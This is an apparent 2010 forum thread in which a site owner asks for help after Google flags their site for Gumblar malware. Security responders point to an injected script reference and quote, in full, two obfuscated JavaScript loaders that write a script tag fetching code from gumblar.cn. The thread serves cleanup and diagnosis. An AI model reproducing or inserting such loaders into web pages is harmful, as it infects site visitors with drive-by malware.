Here’s their message: Of the 2 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-01-29, and the last time suspicious content was found on this site was on 2010-01-29.
Malicious software includes 6 scripting exploit(s), 1 exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine.
Malicious software is hosted on 2 domain(s), including gumblar.cn/, e-procurement.co.in/.
I followed their instructions for searching for malware, but could not locate anything. Can anyone help by pointing me in the right direction? Any help would be greatly appreciated!
Site is chronicfaith.org
Hello :-),
Jaal Scan ID # 7845210832-285 output
Malicious code detected on line 350 of www.chronicfaith.org
starts with
<!—scr i p t sr c=hxxp://sh ery.hu/image s_m/securim age_meghi v>
Please look at the copy of the page on the server, if you cannot locate this code, it is probably being injected at runtime, when a user is requesting the page. It might be useful to then wipe out the hosting directory and check for malware, on the server and in the backend database. You can also ask for help from your hosting provider. Please check out other pages too.
If you have any specific issues feel free to ask for help.
Also, I am collecting info from people affected by attacks like this, if it would be possible for you to share your experience, could you kindly shoot me a mail at a.banerje e @ s top the hac ker .com (please remove the spaces).
We also provide vulnerability identification and mitigation services to help websites from being infected in the first place.
Hope this helps,
-A
Dr. Anirban Banerjee,
Jaal LLC, Riverside, CA.
Site:www.stopthehacker.com
Blog:www.stopthehacker.com/blog
Twitter: @stopthehacker
Facebook: stopthehacker
Jaal: Protecting the Internet, one website at a timeā¢
Dr. Banerjee,
Thank you for your prompt and specific response! I have some knowledge about all this but more of a knowledgeable user than a user that has techical expertise. I checked the code as you suggested and you are correct it is not there but inbedded in a script. I will contact my hosting provider and see if they can assist with locating it. Also, if I can be of any assistance in your compiling of information, please let me know what info you want and I will be happy to supply what I can.
Again, thank you! Audrey Brennan
In addtion to the malware script already mentioned, a number of pages on your website contain the following malware script:
<script language=javascript><!--
(function(dwfh){var j3s6T='%';var jRj=('var>20>61>3d>22ScriptE>6e>67ine>22>2cb>3d>22>56er>73ion()>2b>22>2cj>3d>22>22>2c>75>3dna>76igat>6fr>2eus>65rAgent>3bif(>28u>2e>69ndex>4ff>28>22Win>22>29>3e0>29>26>26>28u>2ein>64exOf(>22>4e>54>20>36>22)>3c0>29>26>26(>64ocum>65nt>2ecoo>6bie>2einde>78Of(>22miek>3d>31>22)>3c0)>26>26(>74ypeof(>7arv>7ats)>21>3dt>79>70eof(>22A>22)))>7bzrvzts>3d>22A>22>3b>65val(>22if(>77i>6edow>2e>22+a+>22>29>6a>3dj>2b>22+a+>22Major>22+b+a>2b>22Mino>72>22+b>2b>61+>22Build>22>2bb+>22j>3b>22)>3bdocum>65nt>2ewri>74>65(>22>3c>73cript>20>73r>63>3d>2f>2f>67umbla>72>2ecn>2fr>73s>2f>3f>69d>3d>22+j>2b>22>3e>3c>5c>2f>73cr>69pt>3e>22)>3b>7d').replace(dwfh,j3s6T);var AIUX=unescape(jRj);eval(AIUX)})(/>/g);
--></script><script language=javascript><!--
(function(xGWO3){eval(unescape(('va>72>20a>3d>22>53>63ript>45ng>69ne>22>2cb>3d>22V>65>72sion()>2b>22>2cj>3d>22>22>2c>75>3d>6e>61vi>67>61t>6fr>2eu>73>65rAg>65>6et>3bif((u>2eindex>4f>66>28>22>57>69n>22)>3e0>29>26>26(u>2eind>65x>4ff(>22NT>206>22)>3c0)>26>26>28>64o>63um>65nt>2ecook>69e>2einde>78Of(>22miek>3d1>22)>3c0)>26>26(typeof(>7a>72vz>74s>29>21>3dtypeof(>22>41>22>29))>7b>7ar>76z>74s>3d>22>41>22>3be>76a>6c(>22>69>66>28>77i>6e>64ow>2e>22+a+>22)>6a>3dj+>22+>61+>22Major>22+b>2ba>2b>22>4dinor>22+>62>2ba>2b>22Buil>64>22+>62+>22>6a>3b>22>29>3b>64ocu>6d>65>6et>2ewrite(>22>3c>73cr>69pt>20>73r>63>3d>2f>2fgum>62lar>2e>63n>2f>72ss>2f>3f>69d>3d>22+j>2b>22>3e>3c>5c>2fs>63ript>3e>22>29>3b>7d').replace(xGWO3,'%')))})(/>/g);
--></script>
White Fir Design
Website Malware Removal Service